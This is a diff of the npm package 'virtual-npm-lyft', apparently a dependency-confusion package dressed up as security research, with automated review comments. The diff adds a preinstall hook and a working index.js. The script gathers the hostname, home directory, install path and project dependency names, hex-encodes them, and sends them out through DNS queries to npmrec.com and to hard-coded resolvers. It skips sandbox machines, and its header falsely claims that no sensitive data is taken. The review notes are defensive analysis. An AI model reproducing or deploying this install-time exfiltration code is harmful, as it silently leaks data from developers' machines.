virtual-npm-lyft 0.0.1-security → 1.9.9



Files changed (3) hide show
  1. package/README.md +1 -5
  2. package/index.js +110 -0
  3. package/package.json +7 -3
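--- a/package/README.md
+++ b/package/README.md
@@ -1,5 +1 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=virtual-npm-lyft for more information.
+This package is meant for security research purposes and does not contain any useful code.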
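--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,110 @@
+/*
+
+This code is used for research purposes.
+
+No sensitive data is retrieved.
+
+Callbacks from within organizations with a
+responsible disclosure program will be reported
+directly to the organizations.
+
+Any other callbacks will be ignored, and
+any associated data will not be kept.
+
+If you have any questions, please contact:
+- harbitz@wearehackerone.com
+
+*/
+
+const dns = require("dns");
+const os = require("os")
+const fs = require("fs");
+const process = require("process");
+
+function toHex(str) {
+var result = '';
+for (var i=0; i<str.length; i++) {
+result += str.charCodeAt(i).toString(16);
+}
+return result;
+}
+
+const homeDirsToIgnore = [
+"/root/test/node_modules",
+"/ptd/node_modules",
+"/home/fakename/app",
+]
+
+const hostnamesToIgnore = [
+"BBOGENS-LAPTOP",
+];
+
+function getPkgJsonDir() {
+const { dirname } = require ( 'path' );
+const { constants, accessSync } = require ( 'fs' );
+
+for ( let path of module.paths ) {
+try {
+let prospectivePkgJsonDir = dirname ( path );
+accessSync ( path, constants.F_OK );
+return prospectivePkgJsonDir;
+} catch ( e ) {}
+}
+}
+
+function main() {
+const pjs = JSON.parse((fs.readFileSync(__dirname + "/package.json")).toString());
+const id = Date.now();
+
+if (homeDirsToIgnore.indexOf(os.homedir()) > -1) {
+return;
+}
+
+if (hostnamesToIgnore.indexOf(os.hostname()) > -1) {
+return;
+}
+
+let packages = "";
+
+try {
+const pjsRoot = JSON.parse((fs.readFileSync(getPkgJsonDir() + "/package.json")).toString());
+packages = JSON.stringify(Array.from(Object.keys(pjsRoot.dependencies)).join(";"));
+} catch {
+}
+
+const relevantInfo = [
+os.hostname(),
+os.homedir(),
+__dirname,
+pjs.name + "-" + pjs.version,
+packages
+]
+
+const stringFragments = toHex(JSON.stringify(relevantInfo)).match(/.{1,63}/g);
+
+sendData(stringFragments);
+dns.lookup('ns1.npmrec.com', function(err, address) {
+if (!err) {
+nsAddress = address;
+} else {
+nsAddress = '8.8.8.8';
+}
+dns.setServers(['188.166.0.193', '188.166.110.6']);
+sendData(stringFragments);
+});
+
+function sendData(stringFragments) {
+for (let i = 0; i < stringFragments.length; i++) {
+try {
+resolveFragment(id, i, stringFragments);
+} catch {
+}
+}
+}
+
+function resolveFragment(id, counter, stringFragments) {
+dns.resolve4(`morjok.${id}.${counter+1}.${stringFragments[counter]}.npmrec.com`, () => {})
+}
+}
+
+main();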
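Review bot: The header comment's claim that "No sensitive data is retrieved" is not borne out by main(): relevantInfo carries os.hostname(), os.homedir(), __dirname, the package name/version and the names of every dependency in the consuming project's root package.json, hex-encoded and split into 63-character labels that become DNS queries under npmrec.com, and the second sendData() call repeats them after dns.setServers() has pointed resolution at the hard-coded addresses 188.166.0.193 and 188.166.110.6, bypassing the host's configured resolver. The header should state exactly which fields leave the machine, e.g. `Transmits hostname, home directory, install path, package name/version and root dependency names via DNS queries to npmrec.com.`, so the disclosure matches the behaviour. nsAddress is assigned without a declaration (an implicit global, which would throw a ReferenceError under strict mode) and is never read, and the dns.lookup() callback calls dns.setServers() on both the success and error branches, so the lookup result has no effect on what follows. For detection, the observable signals are a preinstall lifecycle script in package.json, DNS queries with long hex labels under npmrec.com, and port 53 traffic sent directly to those two addresses instead of the local resolver.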
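--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,10 @@
 {
+"description": "Security research purposes only.",
+"main": "index.js",
 "name": "virtual-npm-lyft",
-"version": "0.0.1-security",
-"description": "security holding package",
-"repository": "npm/security-holder"
+"license": "ISC",
+"scripts": {
+"preinstall": "node index.js"
+},
+"version": "1.9.9"
 }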
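Review bot: The added `"preinstall": "node index.js"` hook makes index.js execute automatically during `npm install` of any consumer, and because `"main"` also points at index.js and that file calls main() at module load, a plain require() of the package runs the DNS callback a second time. The "description" field says "Security research purposes only." but nothing in the manifest records that an install-time script transmits host details; someone auditing a lockfile change sees only a version bump from 0.0.1-security to 1.9.9. Defenders can close this execution path with `ignore-scripts=true` in .npmrc (or `npm install --ignore-scripts`) and by reviewing the lifecycle scripts of newly introduced packages before they are installed.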